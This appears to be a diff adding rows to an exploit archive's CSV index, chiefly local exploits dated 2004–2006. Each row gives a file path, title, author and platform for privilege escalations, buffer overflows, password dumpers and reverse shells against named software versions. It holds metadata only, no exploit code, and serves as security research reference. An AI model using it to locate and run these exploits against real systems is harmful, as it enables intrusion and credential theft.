+695,exploits/linux/local/695.c,"Cscope 15.5 - Symlink",2004-12-17,Gangstuck,local,linux, +698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",local,ultrix, +699,exploits/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,local,aix, +701,exploits/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation",2004-12-21,cees-bart,local,aix, +713,exploits/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",local,solaris, +714,exploits/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",local,solaris, +715,exploits/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Local Privilege Escalation",2004-12-24,"Marco Ivaldi",local,solaris, +718,exploits/linux/local/718.c,"Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",local,linux, +739,exploits/bsd/local/739.c,"FreeBSD - '/usr/bin/top' Format String",2001-07-23,truefinder,local,bsd, +741,exploits/linux/local/741.pl,"HTGET 0.9.x - Local Privilege Escalation",2005-01-05,nekd0,local,linux, +744,exploits/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)",2005-01-07,"Paul Starzetz",local,linux, +749,exploits/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Privilege Escalation",2005-01-11,"Cesar Cerrudo",local,windows, +756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local (PoC)",2005-01-15,"Rafael Carrasco",local,linux, +758,exploits/osx/local/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,local,osx, +760,exploits/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper",2005-01-16,ATmaCA,local,windows, +763,exploits/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility",2005-01-20,vade79,local,linux,79 +766,exploits/osx/local/766.c,"Apple Mac OSX 10.3.7 - 'mRouter' Local Privilege Escalation",2005-01-22,nemo,local,osx, +769,exploits/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow",2005-01-24,ATmaCA,local,windows, +776,exploits/linux/local/776.c,"Mandrake / Slackware /usr/bin/trn - Local Privilege Escalation (Not SUID)",2005-01-26,ZzagorR,local,linux, +778,exploits/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Local Privilege Escalation (2)",2005-01-27,"Tim Hsu",local,linux, +779,exploits/linux/local/779.sh,"ncpfs < 2.2.6 (Gentoo / Linux) - Local Privilege Escalation",2005-01-30,super,local,linux, +788,exploits/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Local Privilege Escalation",2005-02-05,"Charles Stevenson",local,linux, +791,exploits/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Local Overflow",2005-02-07,"Kevin Finisterre",local,linux, +792,exploits/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",local,linux, +793,exploits/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,local,osx, +795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,local,osx, +796,exploits/linux/local/796.sh,"Exim 4.42 - Local Privilege Escalation",2005-02-07,darkeagle,local,linux, +798,exploits/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,local,windows, +803,exploits/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users",2005-02-09,Kozan,local,windows, +811,exploits/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Credential Recover",2005-02-10,Kozan,local,windows, +816,exploits/linux/local/816.c,"GNU a2ps - Anything to PostScript Not SUID Local Overflow",2005-02-13,lizard,local,linux, +824,exploits/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Non SUID Local Shell",2005-09-13,Qnix,local,linux, +833,exploits/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure",2005-02-22,Kozan,local,windows, +834,exploits/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure",2005-02-22,Kozan,local,windows, +835,exploits/windows/local/835.c,"SendLink 1.5 - Local Password Disclosure",2005-02-22,Kozan,local,windows, +836,exploits/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure",2005-02-23,Kozan,local,windows, +837,exploits/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure",2005-02-23,Kozan,local,windows, +839,exploits/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",local,windows, +844,exploits/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure (ASM)",2005-02-26,illwill,local,windows, +846,exploits/windows/local/846.cpp,"Einstein 1.01 - Local Password Disclosure",2005-02-27,Kozan,local,windows, +848,exploits/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure (ASM)",2005-02-28,illwill,local,windows, +863,exploits/windows/local/863.cpp,"RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow",2005-03-07,nolimit,local,windows, +876,exploits/linux/local/876.c,"PaX - Double-Mirrored VMA munmap Privilege Escalation",2005-03-14,"Christophe Devine",local,linux, +877,exploits/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow",2005-03-14,"Kevin Finisterre",local,linux, +884,exploits/windows/local/884.cpp,"iSnooker 1.6.8 - Local Password Disclosure",2005-03-16,Kozan,local,windows, +885,exploits/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure",2005-03-16,Kozan,local,windows, +890,exploits/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,local,linux, +895,exploits/linux/local/895.c,"Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)",2005-03-22,sd,local,linux, +896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Privilege Escalation",2005-03-22,vade79,local,osx, +898,exploits/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,local,aix, +905,exploits/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow",2005-04-01,class101,local,windows, +912,exploits/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Licence Recover",2005-04-04,Kozan,local,windows, +913,exploits/linux/local/913.pl,"Aeon 0.2a - Local Linux (1)",2005-04-05,lammat,local,linux, +914,exploits/linux/local/914.c,"Aeon 0.2a - Local Linux (2)",2005-04-05,patr0n,local,linux, +918,exploits/windows/local/918.c,"FTP Now 2.6.14 - Local Password Disclosure",2005-04-06,Kozan,local,windows, +919,exploits/windows/local/919.c,"FireFly 1.0 - Local Proxy Password Disclosure",2005-04-07,Kozan,local,windows, +920,exploits/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure",2005-04-07,Kozan,local,windows, +924,exploits/linux/local/924.c,"sash 3.7 - Local Buffer Overflow",2005-04-08,lammat,local,linux, +926,exploits/linux/local/926.c,"Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-10-26,qobaiashi,local,linux, +927,exploits/windows/local/927.c,"Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow",2005-04-11,"Stuart Pearson",local,windows, +929,exploits/windows/local/929.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell (1)",2005-04-12,"Tal Zeltzer",local,windows, +932,exploits/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Local Buffer Overflow",2005-04-13,"Esteban Fayo",local,windows, +933,exploits/windows/local/933.sql,"Oracle Database PL/SQL Statement - Multiple SQL Injections s",2005-04-13,"Esteban Fayo",local,windows, +935,exploits/windows/local/935.c,"Morpheus 4.8 - Local Chat Passwords Disclosure",2005-04-13,Kozan,local,windows, +936,exploits/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure",2005-04-13,Kozan,local,windows, +937,exploits/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,local,windows, +938,exploits/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution (MS05-016)",2005-04-14,ZwelL,local,windows, +950,exploits/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,local,linux, +951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)",2005-04-22,"Jean Luc",local,windows, +963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows, +964,exploits/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,local,windows, +965,exploits/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure",2005-04-28,Kozan,local,windows, +966,exploits/windows/local/966.c,"NotJustBrowsing 1.0.3 - Local Password Disclosure",2005-04-28,Kozan,local,windows, +971,exploits/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation",2005-04-29,"Jerome Athias",local,windows, +972,exploits/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Format String Privilege Escalation",2005-04-30,"Kevin Finisterre",local,solaris, +973,exploits/linux/local/973.c,"ARPUS/Ce - Local File Overwrite (setuid)",2005-05-01,"Kevin Finisterre",local,linux, +974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid) (Perl)",2005-05-01,"Kevin Finisterre",local,linux, +997,exploits/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Local Privilege Escalation",2005-05-17,newbug,local,linux, +1001,exploits/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,local,aix, +1009,exploits/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Read Emails",2005-05-25,Plugger,local,linux, +1019,exploits/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local (MS05-012)",2005-05-31,"Cesar Cerrudo",local,windows, +1029,exploits/linux/local/1029.c,"ePSXe 1.6.0 - 'nogui()' Local Privilege Escalation",2005-06-04,Qnix,local,linux, +1032,exploits/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Local Privilege Escalation",2005-06-07,"Ilya Rabinovich",local,windows, +1034,exploits/windows/local/1034.cpp,"WinZip 8.1 - Command Line Local Buffer Overflow",2005-06-07,ATmaCA,local,windows, +1043,exploits/osx/local/1043.c,"Apple Mac OSX 10.4 - launchd Race Condition",2005-06-14,intropy,local,osx, +1044,exploits/aix/local/1044.c,"AIX 5.2 - 'netpmon' Local Privilege Escalation",2005-06-14,intropy,local,aix, +1045,exploits/aix/local/1045.c,"AIX 5.2 - 'ipl_varyon' Local Privilege Escalation",2005-06-14,intropy,local,aix, +1046,exploits/aix/local/1046.c,"AIX 5.2 - 'paginit' Local Privilege Escalation",2005-06-14,intropy,local,aix, +1073,exploits/solaris/local/1073.c,"Solaris 9/10 - 'ld.so' Local Privilege Escalation (1)",2005-06-28,"Przemyslaw Frasunek",local,solaris, +1074,exploits/solaris/local/1074.c,"Solaris 9/10 - 'ld.so' Local Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",local,solaris, +1085,exploits/windows/local/1085.c,"Willing Webcam 2.8 - Licence Information Disclosure",2005-07-04,Kozan,local,windows, +1086,exploits/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure",2005-07-04,Kozan,local,windows, +1087,exploits/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,local,bsd, +1091,exploits/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow",2005-07-06,c0d3r,local,windows, +1092,exploits/solaris/local/1092.c,"Solaris (SPARC/x86) - Local Socket Hijack",2005-07-06,c0ntex,local,solaris, +1119,exploits/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - 'modlines' Local Command Execution",2005-07-25,"Georgi Guninski",local,multiple, +1128,exploits/windows/local/1128.c,"Microsoft Windows - 'LegitCheckControl.dll' Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,local,windows, +1154,exploits/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Privilege Escalation",2005-08-16,"Charles Stevenson",local,linux, +1161,exploits/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation",2005-04-27,"Reed Arvin",local,windows, +1168,exploits/windows/local/1168.c,"WinAce 2.6.0.5 - Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,local,windows, +1170,exploits/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup - Local Privilege Escalation",2001-07-13,"Charles Stevenson",local,linux, +1173,exploits/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,local,windows, +1174,exploits/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,local,windows, +1181,exploits/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1)",2004-12-24,"Marco Ivaldi",local,linux, +1182,exploits/solaris/local/1182.c,"Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Local Privilege Escalation",2004-12-24,"Marco Ivaldi",local,solaris, +1185,exploits/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Local Privilege Escalation",2005-08-30,vade79,local,osx, +1186,exploits/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Local Privilege Escalation",2005-08-30,vade79,local,osx, +1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Remote Client-Side Buffer Overflow",2005-08-30,vade79,local,linux, +1197,exploits/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Escalation",2005-09-06,"Andrés Acunha",local,windows, +1198,exploits/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,local,windows, +1215,exploits/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Local Privilege Escalation",2005-09-14,Qnix,local,linux, +1229,exploits/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Local Privilege Escalation",2005-09-24,kingcope,local,linux, +1230,exploits/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - Local Privilege Escalation",2005-09-24,kingcope,local,bsd, +1248,exploits/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",local,solaris, +1267,exploits/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow / Privilege Escalation",2005-10-20,qaaz,local,linux, +1297,exploits/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation",2005-11-07,"Xavier de Leon",local,linux, +1299,exploits/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Local Privilege Escalation",2005-11-08,Hunger,local,linux, +1300,exploits/linux/local/1300.sh,"Operator Shell (OSH) 1.7-14 - Local Privilege Escalation",2005-11-09,"Charles Stevenson",local,linux, +1310,exploits/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",local,linux, +1311,exploits/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure",2005-11-09,kingcope,local,bsd, +1316,exploits/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",local,linux, +1347,exploits/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",local,qnx, +1360,exploits/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Overflow",2005-12-07,c0ntex,local,solaris, +1397,exploits/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation",2005-12-30,alert7,local,linux, +1402,exploits/sco/local/1402.c,"SCO OpenServer 5.0.7 - 'termsh' Local Privilege Escalation",2006-01-03,prdelka,local,sco, +1403,exploits/windows/local/1403.c,"WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)",2006-01-04,K4P0,local,windows, +1404,exploits/windows/local/1404.c,"WinRAR 3.30 - 'Filename' Local Buffer Overflow (2)",2006-01-04,c0d3r,local,windows, +1406,exploits/windows/local/1406.php,"PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,local,windows, +1407,exploits/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)",2006-01-05,SoBeIt,local,windows, +1412,exploits/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,local,linux, +1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,local,linux, +1425,exploits/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,local,linux, +1445,exploits/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",local,linux, +1449,exploits/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow",2006-01-25,"rod hedor",local,linux, +1455,exploits/windows/local/1455.txt,"Oracle Database Server 9i/10g - 'XML' Local Buffer Overflow",2006-01-26,Argeniss,local,windows, +1465,exploits/windows/local/1465.c,"Microsoft Windows - ACLs Privilege Escalation (2)",2006-02-12,"Andres Tarasco",local,windows, +1470,exploits/windows/local/1470.c,"Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)",2006-02-06,bratax,local,windows, +1479,exploits/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation",2006-02-08,kokanin,local,qnx, +1481,exploits/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation",2006-02-08,kokanin,local,qnx, +1490,exploits/windows/local/1490.c,"Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)",2006-02-11,k3xji,local,windows, +1495,exploits/windows/local/1495.cpp,"Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)",2006-02-14,darkeagle,local,windows, +1518,exploits/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)",2006-02-20,"Marco Ivaldi",local,linux, +1534,exploits/sco/local/1534.c,"SCO Unixware 7.1.3 - 'ptrace' Local Privilege Escalation",2006-02-26,prdelka,local,sco, +1545,exploits/osx/local/1545.pl,"Apple Mac OSX - '/usr/bin/passwd' Custom Passwd Privilege Escalation",2006-03-01,vade79,local,osx, +40340,exploits/windows/local/40340.txt,"WIN-911 7.17.00 - Multiple Vulnerabilities",2016-09-06,sh4d0wman,local,windows, +1554,exploits/multiple/local/1554.c,"LibTiff 3.7.1 - BitsPerSample Tag Local Buffer Overflow",2006-03-05,"Agustin Gianni",local,multiple, +1555,exploits/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp' Local Buffer Overflow",2006-03-05,Kozan,local,windows, +1577,exploits/irix/local/1577.sh,"SGI IRIX 6.5.28 - 'runpriv' Design Error",2005-10-10,anonymous,local,irix, +1579,exploits/linux/local/1579.pl,"Ubuntu 5.10 Installer - Password Disclosure",2006-03-12,"Kristian Hermansen",local,linux, +1584,exploits/windows/local/1584.cpp,"Microsoft Windows - Telephony Service Command Execution (MS05-040)",2006-03-14,"Cesar Cerrudo",local,windows, +1591,exploits/linux/local/1591.py,"Python 2.4.2 - 'realpath()' Local Stack Overflow",2006-03-18,"Gotfault Security",local,linux, +1596,exploits/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation",2006-03-20,"H D Moore",local,linux, +1624,exploits/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) - rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",local,tru64, +1625,exploits/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) - edauth NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",local,tru64, +1719,exploits/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL",2006-04-26,N1V1Hd,local,multiple, +1772,exploits/windows/local/1772.c,"Intel Wireless Service - 's24evmon.exe' Shared Memory",2006-05-09,"Ruben Santamarta",local,windows, +1806,exploits/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,local,windows, +40336,exploits/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",local,win_x86-64, +1831,exploits/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,local,linux, +1910,exploits/windows/local/1910.c,"Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",local,windows, +1911,exploits/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",local,windows, +1917,exploits/windows/local/1917.pl,"Pico Zip 4.01 - 'Filename' Local Buffer Overflow",2006-06-15,c0rrupt,local,windows, +1924,exploits/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,local,multiple, +1944,exploits/windows/local/1944.c,"Microsoft Excel - Remote Code Execution",2006-06-22,"naveed afzal",local,windows, +1958,exploits/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack Buffer Overflow (SEH)",2006-06-27,FistFuXXer,local,windows, +1962,exploits/osx/local/1962.pl,"Apple Mac OSX 10.4.6 (x86) - 'launchd' Local Format String",2006-06-28,"Kevin Finisterre",local,osx, +1973,exploits/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",local,osx, +1978,exploits/windows/local/1978.pl,"Microsoft Excel - Universal Hlink Local Buffer Overflow",2006-07-02,"SYS 49152",local,windows, +1985,exploits/windows/local/1985.py,"WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow",2006-07-05,muts,local,windows, +1986,exploits/windows/local/1986.cpp,"Microsoft Excel 2000/2003 (French) - Hlink Local Buffer Overflow",2006-07-06,NSRocket,local,windows, +1988,exploits/windows/local/1988.pl,"Microsoft Excel 2003 (Italian) - Hlink Local Buffer Overflow",2006-07-06,oveRet,local,windows, +1992,exploits/windows/local/1992.py,"WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow",2006-07-07,"Jerome Athias",local,windows, +1999,exploits/windows/local/1999.pl,"Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC)",2006-07-09,"SYS 49152",local,windows, +2004,exploits/linux/local/2004.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)",2006-07-11,"dreyer & RoMaNSoFt",local,linux, +2005,exploits/linux/local/2005.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2)",2006-07-12,"Julien Tinnes",local,linux, +2006,exploits/linux/local/2006.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",local,linux, +2011,exploits/linux/local/2011.sh,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)",2006-07-14,Sunay,local,linux, +2013,exploits/linux/local/2013.c,"Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation",2006-07-15,h00lyshit,local,linux, +2015,exploits/linux/local/2015.py,"Rocks Clusters 4.1 - 'umount-loop' Local Privilege Escalation",2006-07-15,"Xavier de Leon",local,linux, +2016,exploits/linux/local/2016.sh,"Rocks Clusters 4.1 - 'mount-loop' Local Privilege Escalation",2006-07-15,"Xavier de Leon",local,linux, +2031,exploits/linux/local/2031.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation",2006-07-18,"Marco Ivaldi",local,linux, +2056,exploits/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,local,windows, +2065,exploits/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",local,windows, +2067,exploits/solaris/local/2067.c,"Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1)",2006-07-24,prdelka,local,solaris, +2091,exploits/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution",2006-07-30,NSRocket,local,windows, +2094,exploits/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows",2006-07-31,"Luigi Auriemma",local,windows, +2106,exploits/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx, +2107,exploits/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx, +2108,exploits/osx/local/2108.sh,"Apple Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx, +2111,exploits/osx/local/2111.pl,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow (2)",2006-08-02,"Kevin Finisterre",local,osx, +2144,exploits/linux/local/2144.sh,"liblesstif 2-0.93.94-4mdk - 'DEBUG_FILE' Local Privilege Escalation",2006-08-08,"Karol Wiesek",local,linux, +2152,exploits/php/local/2152.php,"PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC)",2006-08-08,Heintz,local,php, +2193,exploits/linux/local/2193.php,"PHP 4.4.3/5.1.4 - 'sscanf' Local Buffer Overflow",2006-08-16,Andi,local,linux, +2241,exploits/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)",2006-08-22,"Marco Ivaldi",local,solaris, +2242,exploits/solaris/local/2242.sh,"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak",2006-08-22,"Marco Ivaldi",local,solaris, +2264,exploits/windows/local/2264.html,"VMware 5.5.1 - 'ActiveX' Local Buffer Overflow",2006-08-27,c0ntex,local,windows, +2278,exploits/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,local,windows, +2284,exploits/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor",2006-09-01,"Andres Tarasco",local,windows, +2286,exploits/windows/local/2286.cpp,"PowerZip 7.06.38950 - 'Filename Handling' Local Buffer Overflow",2006-09-01,bratax,local,windows, +2330,exploits/solaris/local/2330.c,"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",local,solaris, +2331,exploits/solaris/local/2331.c,"X11R6 < 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow",2006-09-08,"RISE Security",local,solaris, +2332,exploits/sco/local/2332.c,"X11R6 < 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow",2006-09-08,"RISE Security",local,sco, +2338,exploits/linux/local/2338.c,"openmovieeditor 0.0.20060901 - 'name' Local Buffer Overflow",2006-09-09,Qnix,local,linux, +2360,exploits/solaris/local/2360.c,"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)",2006-09-13,"Marco Ivaldi",local,solaris, +2404,exploits/linux/local/2404.c,"Dr.Web AntiVirus 4.33 - LHA long Directory name Local Overflow",2006-09-20,Guay-Leroux,local,linux, +2412,exploits/windows/local/2412.c,"Microsoft Windows Kernel - Local Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,local,windows, +2463,exploits/osx/local/2463.c,"Apple Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,local,osx, +2464,exploits/osx/local/2464.pl,"Apple Mac OSX 10.4.7 - Mach Exception Handling Local (10.3.x)",2006-09-30,"Kevin Finisterre",local,osx, +2466,exploits/linux/local/2466.pl,"cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation",2006-10-01,"Clint Torrez",local,linux, +2492,exploits/linux/local/2492.s,".ELF Binaries - Local Privilege Escalation",2006-10-08,Sha0,local,linux, +2543,exploits/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",local,solaris, +2565,exploits/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Local Privilege Escalation",2006-10-15,"Kevin Finisterre",local,osx, +2569,exploits/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",local,solaris, 